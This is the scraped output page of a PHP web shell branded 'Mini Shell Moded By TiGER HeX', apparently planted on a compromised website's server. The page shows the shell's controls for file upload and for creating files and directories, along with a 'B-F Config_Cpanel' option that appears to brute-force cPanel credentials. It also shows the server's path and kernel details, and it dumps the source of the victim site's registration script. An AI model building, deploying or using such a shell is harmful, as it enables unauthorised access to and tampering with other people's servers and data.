Mini Shell Moded By TiGER HeX
Home
||
Turbo Force
||
B-F Config_Cpanel
Current Path :
/
var
/
www
/
ridazz
/
Linux midnightridazz 4.19.0-11-cloud-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64
Upload File :
New :
File
Dir
//var/www/ridazz/registerx9849822.php
<?php include_once('includes/static/configure.php'); include_once('includes/static/util.php'); include_once('includes/static/dbcon.php'); include_once('includes/static/gdimg.php'); include_once('includes/static/sessions.php'); include_once('includes/appTop.php'); require_once('recaptchalib.php'); define('USERNAME_IN_USE', 1); define('INVALID_EMAIL', 2); define('CAPTCHA_FAILED', 3); define('EMAIL_IN_USE', 4); define('INVALID_USERNAME', 5); define('INVALID_PASSWORD', 6); define('PASSWORD_DONT_MATCH', 7); function getErrorString($code) { switch($code) { case USERNAME_IN_USE: return "That username is already in our records. Please try another one."; case EMAIL_IN_USE: return "That email is already in our records. Please try another one."; case INVALID_EMAIL: return "Invalid email address"; case CAPTCHA_FAILED: return "I couldn't tell if you were human or not. Try again"; case INVALID_USERNAME: return "That username is all full of junk or too short. Please pick another"; case INVALID_PASSWORD: return "Please supply a valid password at least six characters long, containing no quotes"; case PASSWORD_DONT_MATCH: return "Passwords don't match, try again"; } return "something didn't work here..."; } session_destroy(); session_write_close(); $pg_name = basename($_SERVER['PHP_SELF']); include_once('includes/header.php'); if(!$errorCode) { $errorCode = $_POST['errorCode']; } ?><div class="title">REGISTRATION<P> <br><br><img src="http://www.midnightridazz.com/images/ridazzaccount.jpg"> <p> <? include_once('includes/footer.php'); include_once('includes/appBottom.php'); ?>